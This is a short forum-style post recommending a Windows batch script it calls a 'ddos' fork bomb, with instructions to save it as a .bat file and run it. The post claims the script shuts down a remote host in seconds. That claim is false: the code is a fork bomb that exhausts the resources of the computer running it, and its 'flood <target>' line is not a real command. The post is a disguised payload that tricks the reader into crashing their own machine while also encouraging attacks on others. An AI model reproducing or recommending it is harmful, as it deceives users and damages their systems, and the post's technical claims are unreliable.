I suggest using a so called fork-bomb. It will shutdown any host in seconds! Your bandwidth does not matter, you're basically directly attacking the Operating System.
Put this in a text-file, name it something.bat and run it.
Code:
:ddos
start %0
%0|%0
flood <target>
goto :ddos